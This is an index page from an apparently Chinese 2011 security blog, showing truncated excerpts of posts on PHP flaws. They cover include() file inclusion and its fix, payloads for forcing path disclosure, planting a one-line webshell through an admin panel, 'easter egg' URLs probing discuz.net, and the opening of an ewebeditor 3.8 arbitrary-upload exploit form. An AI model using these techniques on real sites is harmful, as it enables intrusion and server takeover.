(老文章)PHP程序漏洞产生的原因和防范方法

   
分类:技术 | 2011-09-28 | 撸过 822 次
0人扯蛋

滥用include

1.漏洞原因:

Include是编写PHP网站中最常用的函数,并且支持相对路径。有很多PHP脚本直接把某输入变量作为Include的参数,造成任意引用脚本、绝对路径泄露等漏洞。看以下代码:

...

$includepage=$_GET["includepage"];

include($includepage);

...

很明显,我们只需要提交不同的Includepage变量就可以获得想要的页面。如果提交一个不存在的页面,就可以使PHP脚本发生错误而泄露实际绝对路径(这个问题的解决办法在下面的文章有说明)。

2.漏洞解决:

这个漏洞的解决很简单,就是先判断页[......]

继续阅读

PHP系统暴绝对路径的方法收集

   
分类:安全 | 2011-09-25 | 撸过 879 次
0人扯蛋

1、加引号'这个最常用

 

2、变参数类型,比如把id=1改为id=a等 有时很有效果

 

3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果

 

4、text.php?aa[]=xx

 

5、利用php的max_execution_time, 能将绝对路径显示出来. 这机率非常小.适合在服务器负荷严重的时候测试.

 

6、benchmark(999999999999999999, md5( 'test' ))

BENCHMARK(count,expr):BENC[......]

继续阅读

PHP base64_decode 的两种破解方法

   
分类:安全 | 2011-09-22 | 撸过 1,042 次
0人扯蛋

实际应用:
首先,打开你的文本编辑器,比如记事本,新建一个文本文件,按照那个解密代码,把我的那个footer.php文件里的密码输入进去,然后就类似下面:

<?php
$Code = 'bZA7b8MwDIR3/wpCQ9MudtCpaPxYOmTo1gIZC9mibSGyKEiM1QD98fUjWVovBHQ83n1QVSa50iM0RoZQiJaI0Yst8Yu/eV7UHrJynclDQ+56gOf9/gXyyvUOakOdti097qwccPd0gOp+k+QSeo9tIXpm95plMcaUyfGF04YGUb5fmmueyRK2jGQj4hmtCqnFCeSI0vPi5h4[......]

继续阅读

php后台插一句话新思路

   
分类:安全 | 2011-09-22 | 撸过 2,245 次
0人扯蛋

php后台插一句话的思路加114网址导航后台拿webshell的方法。

首先介绍下php的各种标签:

1):

<?php ?>

demo:

<?php echo "test";?>

这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!

2):

<? echo "test"; ?>

这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,

大多程序员都是很熟悉的!我们把这种标签称为短语标签!

3):

<script language="php"> </script>

demo:[......]

继续阅读

利用“PHP彩蛋”进行敏感信息获取

   
分类:安全 | 2011-09-11 | 撸过 1,276 次
0人扯蛋

关于“PHP彩蛋”的说法也许很多老PHPer已经都知道或听说了,好像是早在PHP4版本的时候就有彩蛋了,挺好玩儿的,可能近年来逐渐被人们遗忘了,其实彩蛋功能在PHP脚本引擎默认情况下是开启。

下面就用Discuz官方论坛做一下测试:



http://www.discuz.net/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42

http://www.discuz.net/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42

http://www.discuz.net/?=PHPE9568F36-D428-11d2[......]

继续阅读

关闭PHP错误报告

   
分类:技术 | 2011-09-11 | 撸过 766 次
0人扯蛋

int error_reporting(int [level]);

0:关闭错误报告

E_NOTICE 表示一般情形不记录,只有程式有错误情形时才用到,例如企图存取一个不存在的变数,或是呼叫 stat() 函式检视不存在的档案。
E_WARNING 通常都会显示出来,但不会中断程式的执行。这对除错很有效。例如:用有问题的常规表示法呼叫 ereg()。
E_ERROR 通常会显示出来,亦会中断程式执行。意即用这个遮罩无法追查到记忆体配置或其它的错误。
E_PARSE 从语法中剖析错误。
E_CORE_ERROR 类似 E_ERROR,但不包括 PHP 核心造成的错误。
E_CORE_WARN[......]

继续阅读

PHP伪静态与防注入

   
分类:技术 | 2011-09-4 | 撸过 974 次
0人扯蛋

PHP伪静态,主要是为了隐藏传递的参数名;于网上搜索后整理伪静态四法
<?php
//伪静态方法一
// localhost/php100/test.php?id|1@action|2
$Php2Html_FileUrl = $_SERVER["REQUEST_URI"];
echo $Php2Html_FileUrl."<br>";// /php100/test.php?id|1@action|2
$Php2Html_UrlString = str_replace("?","",str_replace("/", "", strrchr(strrchr($Php2Html_F[......]

继续阅读

ewebeditor PHP 3.8版本上传任意文件0day

   
分类:安全 | 2011-08-2 | 撸过 1,814 次
0人扯蛋

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似
听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。

EXP如下:

<title>eWebeditoR3.8 for php任意文件上EXP</title>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
URL:<input type=text name=url valu[......]

继续阅读